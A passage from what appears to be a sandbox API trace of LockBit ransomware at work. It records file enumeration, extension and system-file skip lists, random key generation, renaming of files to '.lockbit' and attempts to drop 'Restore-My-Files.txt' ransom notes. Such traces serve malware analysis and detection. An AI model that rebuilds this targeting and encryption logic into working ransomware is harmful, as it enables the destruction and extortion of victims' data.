NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.116] malloc (_Size=0xc2) returned 0x1fa2ed8 [0192.116] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0192.117] free (_Block=0x1fa2ed8) [0192.117] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0192.117] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0192.117] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0192.117] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11910700, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11910700, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Composite.xml", cAlternateFileName="COMPOS~1.XML")) returned 1 [0192.117] lstrcmpiW (lpString1=".", lpString2="Composite.xml") returned -1 [0192.117] lstrcmpiW (lpString1="..", lpString2="Composite.xml") returned -1 [0192.117] PathFindExtensionW (pszPath="Composite.xml") returned=".xml" [0192.117] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0192.117] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0192.117] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0192.117] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0192.117] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0192.117] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0192.117] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0192.117] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0192.117] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0192.118] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Composite.xml") returned 1 [0192.119] lstrcmpiW (lpString1="ntldr", lpString2="Composite.xml") returned 1 [0192.119] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Composite.xml") returned 1 [0192.119] lstrcmpiW (lpString1="bootsect.bak", lpString2="Composite.xml") returned -1 [0192.119] lstrcmpiW (lpString1="autorun.inf", lpString2="Composite.xml") returned -1 [0192.119] lstrcmpiW (lpString1="thumbs.db", lpString2="Composite.xml") returned 1 [0192.119] lstrcmpiW (lpString1="iconcache.db", lpString2="Composite.xml") returned 1 [0192.119] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0192.119] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml") returned=".xml" [0192.119] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0192.119] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0192.119] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0192.120] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0192.120] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml.lockbit") returned 88 [0192.120] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\composite.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0192.125] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0192.125] malloc (_Size=0x40068) returned 0x3df0008 [0192.125] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=964) returned 1 [0192.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0192.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0192.126] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0192.128] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.128] malloc (_Size=0xc6) returned 0x1fa2ed8 [0192.128] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0192.129] free (_Block=0x1fa2ed8) [0192.129] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0192.129] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0192.129] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0192.129] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeefeee00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeefeee00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Concourse.xml", cAlternateFileName="CONCOU~1.XML")) returned 1 [0192.129] lstrcmpiW (lpString1=".", lpString2="Concourse.xml") returned -1 [0192.129] lstrcmpiW (lpString1="..", lpString2="Concourse.xml") returned -1 [0192.129] PathFindExtensionW (pszPath="Concourse.xml") returned=".xml" [0192.130] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0192.130] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0192.131] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Concourse.xml") returned 1 [0192.132] lstrcmpiW (lpString1="ntldr", lpString2="Concourse.xml") returned 1 [0192.132] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Concourse.xml") returned 1 [0192.132] lstrcmpiW (lpString1="bootsect.bak", lpString2="Concourse.xml") returned -1 [0192.132] lstrcmpiW (lpString1="autorun.inf", lpString2="Concourse.xml") returned -1 [0192.132] lstrcmpiW (lpString1="thumbs.db", lpString2="Concourse.xml") returned 1 [0192.132] lstrcmpiW (lpString1="iconcache.db", lpString2="Concourse.xml") returned 1 [0192.132] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0192.132] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml") returned=".xml" [0192.132] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0192.132] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0192.132] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0192.133] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0192.133] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml.lockbit") returned 88 [0192.133] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\concourse.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0192.134] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0192.134] malloc (_Size=0x40068) returned 0x1ff1e60 [0192.134] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=964) returned 1 [0192.134] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0192.135] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0192.135] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0192.140] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.140] malloc (_Size=0xc6) returned 0x1fa2ed8 [0192.140] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0192.141] free (_Block=0x1fa2ed8) [0192.141] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0192.141] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0192.141] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0192.141] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c23400, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x12c23400, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Couture.xml", cAlternateFileName="")) returned 1 [0192.141] lstrcmpiW (lpString1=".", lpString2="Couture.xml") returned -1 [0192.141] lstrcmpiW (lpString1="..", lpString2="Couture.xml") returned -1 [0192.141] PathFindExtensionW (pszPath="Couture.xml") returned=".xml" [0192.141] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0192.141] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0192.141] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0192.141] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0192.141] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0192.141] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0192.141] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0192.142] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Couture.xml") returned 1 [0192.143] lstrcmpiW (lpString1="ntldr", lpString2="Couture.xml") returned 1 [0192.143] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Couture.xml") returned 1 [0192.143] lstrcmpiW (lpString1="bootsect.bak", lpString2="Couture.xml") returned -1 [0192.143] lstrcmpiW (lpString1="autorun.inf", lpString2="Couture.xml") returned -1 [0192.143] lstrcmpiW (lpString1="thumbs.db", lpString2="Couture.xml") returned 1 [0192.143] lstrcmpiW (lpString1="iconcache.db", lpString2="Couture.xml") returned 1 [0192.143] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0192.143] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml") returned=".xml" [0192.143] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0192.143] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0192.144] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0192.144] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0192.144] 